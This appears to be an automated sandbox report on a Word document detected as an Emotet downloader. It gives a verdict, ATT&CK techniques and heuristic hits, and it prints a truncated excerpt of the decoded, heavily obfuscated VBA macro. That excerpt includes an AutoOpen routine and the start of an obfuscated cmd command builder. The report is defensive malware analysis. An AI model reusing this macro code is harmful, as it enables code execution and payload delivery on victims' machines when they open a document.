Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The sample contains VBA macros, including an AutoOpen macro, and a critical heuristic firing for Shell() calls, indicating it is designed to execute arbitrary code. ClamAV detection confirms it as 'Doc.Downloader.Emotet-6826530-0', strongly suggesting Emotet family and a downloader role. The AutoOpen macro likely initiates the execution of the embedded malicious code, which is designed to download and run a second-stage payload.
Heuristics (6)

- ClamAV: Doc.Downloader.Emotet-6826530-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6826530-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20267 bytes |

SHA-256: 74a6c1f41a15dc8175f8af65f184d69a2dd0a246b965041aa6a8209f77059d17

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "oIkdvbi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim tlYjhm(2)
tlYjhm(0) = InStr(WHjwhl + iDFCCZSNcamGvSlJjhRqdT + jtFcrTLr, RjUSfSEL + apwYzNBRMcjYzHAjSuD + JApOBwlS) + Right(TuvhiP + aNQiKifLEblRXOwmzA + JTGLpEa, 413) + InStr(jciba + fVnhqzvzpSidInHOD + bkjHYhuS, GlUiitTp + sOHnqGUqUMmWCzjFRBiL + rmfdunY) + Right(BMdvQR + cJbTOikvkjpONDwUtqw + qJkhZBSn, 180)
tlYjhm(1) = Left(CDIdD + wDoGzJAkRzOjfdFzCBtRw + LBZCVQzo, 964) + Right(jJwYZRAq + XZPfXGtAmsaLchwhQujz + vAiccRGl, 933) + InStrRev(JXzKEot + IwUQwEIiwqaaFPXdUmp + jRKwWMGn, lzjNdsM + AwBimEpQPWTjjhZGlR + SsAiY) + Left(kIphOqfi + SWpYlORAdwTGLvjqlr + WfNilUqE, 984)
Dim AREYJr(1)
AREYJr(0) = InStr(nTlYwQZ + zKhwLwSChYVQizNjSMC + nDHLw, wZQZcDw + GFGJEPkbqzDpvuUKIQnTu + vlSnfCX) + InStrRev(GvPIX + qIKdIiVqilhdTmdUzJj + fziowVMn, wLkWSQQ + wQqMsUkGDTVJzPzhjVVwrsW + mLDiVjO)
Dim onEIf(1)
onEIf(0) = Left(Iuhmv + LPQXwbmQCKkNuYNjMJRCP + QXasM, 674) + Left(qialqJaY + wuoGjIZPCSuNALPqXqbw + wXnWW, 738)
Dim pCiJj(2)
pCiJj(0) = InStrRev(uTBHsPY + NvVTPcjCrnGvJPjLwrc + wwLhAm, QbWrIu + WzHrpwKlRrjtkjEWQ + kPnSqUmY) + Right(jwauV + XABwjvXzhlKEvYNrEWj + NjlzPr, 990)
pCiJj(1) = Right(czQQC + PKqmBNhzCCjiSVdizKasH + AbZTfV, 244) + InStr(MsrWzGDz + SkrWLumTKoRiEBIfXjU + tviHjtG, SPmIFNY + LLAuJrmFvRpIwdQQfjH + mPpsE) + Left(HiiIwbwl + znLKqKJtbzINHoItw + IAKLiqf, 764) + InStr(ZOmTsBw + iLUzwQEomqrPfLzff + FwSjwfj, MoZPVoCM + lrBonjWohBRZzEfPSfUa + CSBuqIn)
Dim npUOPh(1)
npUOPh(0) = Right(PnNVZJ + HbaRzTWIUSAkAZjVGNRF + UdjMFM, 46) + InStrRev(OInMpUTa + OimONilQPWqWmCipCHQSkmR + TAmmLJ, iOViUvO + XlAKKihDowQBcwincjiMNWw + whLCzH)
Clczzzm (KeyString(uAijdi + YzRCis + 8 + 11 + 48 + wrmkmjSs + juJYzRc) + KRCMDcHP + LAtPvI + KeyString(thLhlI + UOzAz + 9 + 12 + 56 + zuctiiI + tiMkmi) + ErtLrpVua + MQawQ + tqojiqC + FqKEcaHLrna + NIWFsIVa + lZAHwaq)
Dim YmoODQ(2)
YmoODQ(0) = Left(dwQtOQ + pQXrWnGPpqzaNNVHJZ + owmsiz, 763) + InStrRev(OGIJS + hzhzNZuPUHftJczivjwIHb + jTESqLw, rvFOw + KrHdAlfLkGmjrusOaLB + ukTjzr) + Left(rVwPTpjw + GGFMpSRXWjRQIiQSvOUQI + sKEFMQ, 747) + InStrRev(KOiuASbj + aFpofGfsbmpwZGTFKTi + PaAVS, nTuUIDVZ + kuuJVRQSMIbnuvJFGuNPn + CzTWku)
YmoODQ(1) = InStrRev(jjADuI + rQfLjYwZzUWfGKz + zDbNVY, JZiwX + wInqBYwnaNNMsutPDnpR + pMpAS) + InStr(JzjzWJ + iHonILwHjjCHniwiMMfwUC + MXwWl, ZjAdhv + aTiVNRXHYaBKTlPIljS + WmOCIMQn)
Dim MZdtmJ(2)
MZdtmJ(0) = InStrRev(WTrGD + kHMDqfYKwOwXOnkfBOuqFIf + IZwHtK, adqwo + uXMCujjucudqvKCGB + GDNll) + Left(UdNAI + vdiiYOBwhmkTijMVrRJpI + KZzhdi, 408)
MZdtmJ(1) = Left(hTXcCBbE + AqTojfnmQloakbjREE + izcKjSqp, 97) + InStrRev(zjqlS + vRJOstmdZunbukwlUDTNa + RnPNqOP, wkTGj + TQvSiMnEvOhDjhNbzN + jXMlmMR)
Dim wwAzf(1)
wwAzf(0) = Right(CacIuAib + AmsHZsijuVcaankpbGESRY + cpfpkEq, 222) + InStrRev(MXDRQQUa + CVhGzlFpUbjAIFriXkPIWhM + pnwqw, HHZrwzB + OdXvMhPpDPmZlzvz + llbZwk) + Left(mYiAzI + qzRGiBuKtwzGzDBFswVNoXB + jmQDVvJ, 966) + InStrRev(nkqQi + KHnUhuJftUjdiPdIdtdKp + CAsCfr, NtPKz + YKBpOUFmamujzzPNs + JOcbcVo)
Dim Edmhi(2)
Edmhi(0) = InStr(ApzKilaV + RnFVIIjwHOOuHnjhhElapic + rBnhbUzA, vUCiDah + pXwJjnzoMQmfvvHhmZInQ + NiViAHwh) + Right(srHtbf + wwQYHbdGzVhjiaVTzMIq + iOiMnK, 889) + Left(SrioX + tHwMqKYZTGMVIRAcNvuM + rjQbAlw, 483) + InStrRev(BtlizD + UEhTZcjQujIzuIlwwYhInbHo + SfJlHsk, KnskwD + TGlzjzJOmwusRjWPXXr + sanGDo)
Edmhi(1) = Right(vrnhd + fAXsFnwszYAZnVEMGJMCK + rzAdH, 814) + InStrRev(kXAzzktu + foLRZMcQaZSzEwziOs + lDwMcGcM, uflpaZ + iZcPRZftnuQjPzNbRjWoN + ChiOV) + InStrRev(wNIVW + ZzNoSzfiuPMzElODRW + fRTHjBoU, DsmIzvN + wnzJdDFXHSUBiWzqCduZ + uMwzlSq) + Right(HJfIqDVw + lHBZmawWMtENnrRFlobQ + pCNIm, 633)
End Sub
Attribute VB_Name = "iRVUSIA"
Function ErtLrpVua()
ZLtDnZJln = "d /V/C" + """" + "^s^e^t" + " ^x^i^U^5=^ ^ ^ ^ ^ " + "^ ^ ^ ^ ^ ^ ^ ^ ^ ^ "
Dim ZoKrV(1)
ZoKrV(0) = Right(lvEGjz + SNLPWntHAhNOKQYqQ + iDRRAcNi, 776) + ... (truncated)
```